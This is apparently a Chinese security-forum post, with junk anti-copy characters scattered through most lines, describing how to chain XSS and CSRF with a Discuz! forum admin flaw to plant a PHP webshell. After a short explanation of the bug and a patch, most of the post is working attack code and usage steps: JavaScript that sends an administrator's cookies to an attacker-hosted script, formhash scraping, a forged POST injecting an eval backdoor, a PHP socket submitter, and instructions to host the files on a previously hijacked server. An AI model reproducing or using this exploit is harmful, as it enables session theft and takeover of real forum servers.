Discuz XSS得webshell
* {$ I. I0 f, CBy racle @tian6.com$ p' H2 @# G/ j6 o6 W
欢迎转帖.但请保留版权信息.
9 k E7 S, b/ c" V' ^. H受影响版本 iscuz<=6.1.0,gbk+utf+big5) ~- U# `( Y9 m0 X! L7 N5 c' j
( P8 O8 ?: j" u' t新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.5 c/ q' {! v0 W* ?/ e2 _( a' d
- f m; w7 Y1 R, t, R
8 k6 V6 u2 O$ L' i4 d: `3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
, M; Z; l4 D% R B0 E当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
& t, a) |9 J) v% m! P" m& U/ {- }* P! X \% ^) A B
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
8 B. m6 f2 s [ g8 c6 G. d本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS4 A; m% H: m: M1 i! ?
$ w2 r9 d( `6 K9 h/ ~0 {) c# s) f) Z) `) i
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
, M2 o; m: p) Z% i. z! j
" _0 R& s0 R4 C0 X
3 V3 T8 [* v- ?' Gproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
m' s# l% S/ o" a. T x! R" I9 ^! i% o1 q' x1 k
problem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
v- E. A- s0 T; _# T* c: w. m, e0 V9 R+ K8 k4 V
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的./ s9 g7 X9 K$ O: X% w/ u6 Z
4 @9 Q- G" D& K1 h" {9 k& I" R$ |1 Y/ _. a/ z1 ~' A% L
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
8 I! S( e% J- E* i
' @6 D5 a, A4 @; R global $runwizardfile, $runwizardhistory;
6 F: G8 M6 E2 E! c1 m/ q; z4 X4 Q y6 I2 N: \% P; F
$fp = fopen($runwizardfile, 'w');: X8 F/ c1 ]# ^3 r3 ^2 U
A5 }3 `% o, ], }) ^! s. c
fwrite($fp, serialize($runwizardhistory));: x/ k/ }7 }' H1 r/ f) t
/ }3 y1 j- B( ~) C+ U+ S& [5 o6 G
fclose($fp);
; q9 A* y' `& L) j4 v( r+ _
6 @" m+ z" o T* M}5 T$ x! }' R0 m2 n) v' t3 \0 {, k
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.& z/ T# V3 a- q# n4 ~% I" x; }) P
以下是修补的办法:function saverunwizardhistory() {
8 g* R ?& x* n M1 u, m! r: U/ o7 H7 F6 P4 R
global $runwizardfile, $runwizardhistory;6 c8 A7 i, m7 O# [$ e5 N
. M* X7 G4 k# }% t y $fp = fopen($runwizardfile, 'w');( M& q3 `8 E% `, ?
1 m! {3 Z: S1 n5 B. X1 M
$s = '<?php exit;?>';$ D4 m0 C" S n
( \" y0 N. H7 q2 H. _1 [+ a. f
$s .= serialize($runwizardhistory);
7 ?5 w* {% t' p: O' x4 a3 \% w
fwrite($fp, $s);
4 d" Z0 o" w: }: W4 I( ]# H) g
4 \% Z6 s' a/ r$ F; r1 R# B/ p- c fclose($fp);
3 p9 v9 s. c2 P' A0 e/ u9 q8 X) x/ j) r4 f3 \" z2 p+ m- t
}8 ^+ x- v% D. l G% a; Z x
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.) V' K# U/ P7 B9 L7 ]
- b" b {( p3 m$ k) t) h' D+ c. `3 {
$ u& a: z0 T$ L" g
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
6 l: N' X9 }* Z5 ]4 G" G! Y; ^) o
0 `4 h. Q7 Q' e7 I: T8 x8 P; m
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.& r/ k% E9 ~+ M0 J: M' i
8 Y1 P }& f6 [
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
+ s% ]6 Q$ f8 F
( n: e% `& K3 c3 a+ I; C# i这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.' l t( h, E& L' K' t
' K ?- d x0 K" z! W1 R% A
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
* M: n( D5 V$ v$ B
' y `- e- r$ E9 u0 W% M8 ]var url="http://目标网站/admincp.php"; & T/ a; f$ ^8 `: w; O) _- y
5 ?; G% B5 c- b
/*获得cookies*/8 _9 u" Y6 Z9 G* }9 A8 b( g" I
8 _0 I* P& ^5 a( i9 e! ^% P
function getURL(s) {+ A: ~0 ?) H2 R. ?
2 ^3 `1 `1 d% b4 _" Q+ `$ ivar image = new Image();
) }/ ~9 ]- ?9 n$ Q" S, W% ^; N ^" p+ f. }
image.style.width = 0;9 D5 l2 M. @5 f) N$ U# Q
: v: F( n& d; ]0 Simage.style.height = 0;
* z% g/ W: }" J, M3 B% u2 }& @5 v9 g
image.src = s;/ @% j3 L1 u; Y* k' E$ V' Y
) e7 c+ A( w2 i}
. `& B$ H- T; Q1 I6 N/ D& t/ X0 O7 y
x3 ]7 ?; P' b) F# k1 vgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
- X R' Q" x* j3 W( u" M4 P复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];4 u; _4 [6 m. _( u) W" G
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
" [7 G! ~- i3 k4 O+ @; m
* w* {/ N9 U* @0 H- w) l8 \- g
3 G1 `) `2 Y& _/ d6 c# m获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";2 A1 i" X* F$ N; Q$ m" f
- @* L+ l- }8 |
! Y: e3 z9 a( [+ o
5 a5 S( U- S9 _7 p
/*hash*/
& ^' `1 u) j" x: q4 @2 c+ z9 t3 }1 a( d+ y
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
7 `$ c! G0 j% z3 k/ O0 n1 c# ^! U: k5 j3 E) |. S+ p; ~1 j+ e
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
/ ~+ P: U* y0 q* R" |6 M+ E% t- E5 \0 Z% D0 l$ m/ J
xmlHttpReq.send();
8 o! T$ G' d4 Q( f3 q7 L5 A8 Y' @( Y
var resource = xmlHttpReq.responseText;
a) d: |. h+ f% D; J
" D6 ^# M. Z. C6 O0 l# \9 Q1 n: Rvar numero = resource.search(/formhash/);
& D) X: [& q- H( ~5 y. o4 E% }+ x+ D" H+ \! F: B x% S0 \
var formhash=encodeURIComponent(resource.substr(numero+17,8));0 \1 K3 X H: o& u: G
8 P8 m0 L' C7 R; N3 f K% [3 I2 @' ~
$ y: C* G, j: Y; @: ]1 vvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
0 O5 Z5 l; r3 ]& _
a& X6 T5 H& z: `9 C' D( C8 qxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
0 e+ c/ ~/ Q, Z4 k7 k" s3 T0 S. Q; j2 t7 l
xmlHttpReq.setRequestHeader("Referer", url);0 e# B$ g2 b$ N- p
, s$ _' f+ a1 O, k! J8 \* O& NxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
$ w5 s! G' z, a( L
6 k$ R; u: M: m( LxmlHttpReq.setrequestheader("content-length",post.length);
6 a" P( i% g' F# A. P
- L) @- M- h( d: h9 o2 |3 l3 x/ NxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); & @- E& z1 i) x) Q# @1 J
, `4 Z1 i. P( i: t9 WxmlHttpReq.send(post);//发送数据
7 c: k2 o) r: S: ]; D+ u复制代码这里HASH我假设正确,这样提交,也无须cookies0 B8 ~ m, L( A( W5 X
* `7 k) \( G" V- Z& G4 W& J: f# {1 d
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
+ a B& w4 P9 ]6 W" T$ b! v% O2 T! o! D9 a
if (!$sock) die("$errstr ($errno)\n");
0 h1 F3 p( Z8 [+ L# d" R# z& ^
( |6 r' k% C2 u, Z) e6 D7 C$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';/ _& I1 j9 h8 r" N4 c
2 ?& [9 w" P Q c% t% T, S
. Q6 J; ~; G7 t
% u: v7 p/ N5 g( |* ?2 [2 tfwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");" R: D- g( ^9 i! l" b
$ O3 B& C, p M7 k# t* ^fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
/ i0 ~6 X1 c/ \% |2 e$ L% f6 \8 }1 v1 P+ U! e0 _4 c
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
2 V" y/ m# O3 l( O- W! Z6 K. D1 ~# I1 d& ]
fwrite($sock, "Accept-Language: zh-cn\r\n");
* G" t. g2 Q" s# d7 i7 s/ @$ ?. N& {. o0 p
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
; I5 \. |& W( L; X) y3 W
2 E4 G* v- e( l f+ Wfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
' X3 H4 b2 a) ]0 N. U$ G) K$ C' {; t+ \' T. f% u0 v( j
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");: [( N# Q& P6 U, m: k
& D- Z' o- S; e% L3 ~- X; w: \% O' Ifwrite($sock, "Host: $url\r\n");
( N& p9 Z. d; o c* z5 G$ r
/ R8 s3 |, J- W+ |. M) [' t5 ufwrite($sock, "Content-Length: ".strlen($data)."\r\n");
7 I3 F. d E, T/ p% z
. P6 x2 r7 [' X* ]- e! Qfwrite($sock, "Connection: Keep-Alive\r\n");
2 t" g6 f' J: Q* Z, c; K
) q3 g& c1 R$ u$ M; b) U& Mfwrite($sock, "Cache-Control: no-cache\r\n");
6 c! |9 x0 g6 b" i- R
; M6 s4 S! Y% [) A3 }fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
$ H9 {. b) d) z, m
/ y% N& G0 L. }4 Y. ?fwrite($sock, $data);! b |) ^! ^/ x( P
; c, M7 Z8 x6 b- e; T
! a7 H: q6 E" k* z4 ~
- r/ r# O |# q
$headers = "";7 ~5 r, @( H8 V) O- y2 G
8 ]3 D. ^" Z \, M9 h6 M* M- o
while ($str = trim(fgets($sock, 4096)))
5 } R @& a l/ w1 b4 |$ ]0 H! P
) E& B: I: v& e $headers .= "$str\n";
* d* [5 K# s. _; J" Q6 w' x) T1 z) u# C, F: S6 v
echo "\n";' U5 L5 v& U+ J$ G, I9 C
: q) [9 {& ~% k9 [; C n
$body = "";
; }6 `0 ^& g7 S& w5 Q% Z( b4 @; z' Z" d
while (!feof($sock))1 j/ _5 d+ n& n' c# a
1 ~1 [1 k( B4 B4 z7 x $body .= fgets($sock, 4096);9 o9 \9 k8 V8 s8 \
) ^. _) Q# a) R7 g2 J V' Z
fclose($sock);, l. K/ g% r0 u1 T
8 `8 ?" m( f Y# q0 r7 Gecho $body;
7 q: f6 d& X, F复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^, G( f3 l4 K! E4 b5 N; f2 R$ k. F
+ Q; s+ `+ E: H4 o
" O# U4 i4 f! O1 f$ t1 q; E+ D, Z-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------3 Z- F; K: Z. _- C
( I4 N( G8 A& Q
/ u; U. y, \- |. }/ K! M; c
1 HP SOCKET利用方法首先打开racle.js
% Y4 _( T( {; f
6 N% J) f3 o& zvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
+ f" O+ I. {7 C- V8 g' g, L$ ~2 Y. {& Y. O* Z C( l& j
6 D: m' L4 @5 }1 J) o: V" h7 B
; O% H" \2 i9 ?& f! n* j然后打开racle@tian6.php
: l0 {: z2 v- K- J4 v, U! Q' p
5 @( M3 s& W( M+ x5 l: U5 K8 P' T$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
# @: x1 b6 ^8 l! R( N" W3 n- I7 _7 p: m8 z% z) p. @# I! h
- b% O+ L( ?2 r
, i" Y1 h$ t" `/ p& v, D4 w4 R如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:8 u: l* C# l) @$ S3 X4 Z' a# o. F0 f
; y; O4 @4 f8 G
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie)); _3 d5 }4 ^& L3 r+ u
! ]4 y; E% J/ p& t4 ]% t' J! h x3 L为
# z* c' E8 Z7 r* V+ C8 ]
6 E/ Y5 g2 V* y. X( H5 ~getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));9 g2 N7 P, A5 k+ O3 }+ @
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址. b/ ^/ J( f$ m1 W
! J* S3 \, G; H5 r
, s {9 ?' u8 j2 p2 w5 T! v! d3 \8 P9 m8 K8 J# T1 h
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:3 E6 a$ y, C: h+ t7 c, S( [- E
0 ]. Z. _! T1 k% `" ]$ Evar formhash=encodeURIComponent(resource.substr(numero+17,8));
: S) ^+ _" a3 h: D6 f a- ?! i. Y7 n3 H) ?3 c
为
S" j% F( N/ U! ~# O. z+ _* P' U, A, q( i6 v
var formhash=encodeURIComponent(resource.substr(numero+9,8));! J0 j, I, E. r3 V" Y6 t2 E
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
/ l1 y8 W0 O$ N4 r. O$ ^: J# R! G1 B
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点." ^7 q# G3 x* `: A
/ |% `, }9 b, R4 X. m如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.7 F/ k! y# r4 |2 a% d/ S& C
9 {: j6 }6 h6 I0 H
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
* n1 z* h1 |6 ]' ^3 Q" ~+ S5 X( F / m' @ H# g7 [
|